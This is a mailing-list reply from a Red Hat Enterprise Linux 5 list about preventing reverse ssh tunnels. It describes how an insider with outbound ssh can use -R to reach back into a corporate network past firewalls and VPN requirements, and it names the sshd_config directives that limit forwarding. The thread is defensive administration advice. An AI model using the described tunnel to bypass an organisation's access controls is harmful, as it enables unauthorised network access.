[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: [rhelv5-list] disable reverse ssh in sshd_config ?



Hugh Brown wrote:

FM wrote:
Yes the -R, ... And I am part of the network team LOL


Allowing inbound ssh w/ shell access means that your network perimeter/firewall is swiss cheese.

Minor correction/clarification here... Allowing *outbound* ssh also means your network perimeter is equally swiss-cheese to someone who knows how to use ssh -R.

For example, if I can ssh out from a host inside your corporate network to an outside machine I control, using -R, I can then hop on that outside machine and ssh back into the corporate network over that reverse tunnel, completely bypassing all access restrictions, vpn requirements, etc.

I'm assuming that disallowing inbound ssh is not an option. If that's the case, then you can't do anything to guarantee that folks can't do things you don't want them to do. You can set the directives:

AllowTcpForwarding no
GatewayPorts no

However, the sshd_config man page has this to say about AllowTcpForwarding:

 "Note that disabling TCP forwarding does not improve secu-
             rity unless users are also denied shell access, as they can
             always install their own forwarders."

Indeed, ssh in the hands of a user who knows what they're doing... You can certainly make it more difficult, but generally speaking, you're not going to stop a determined user.

--
Jarod Wilson
jwilson redhat com


[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]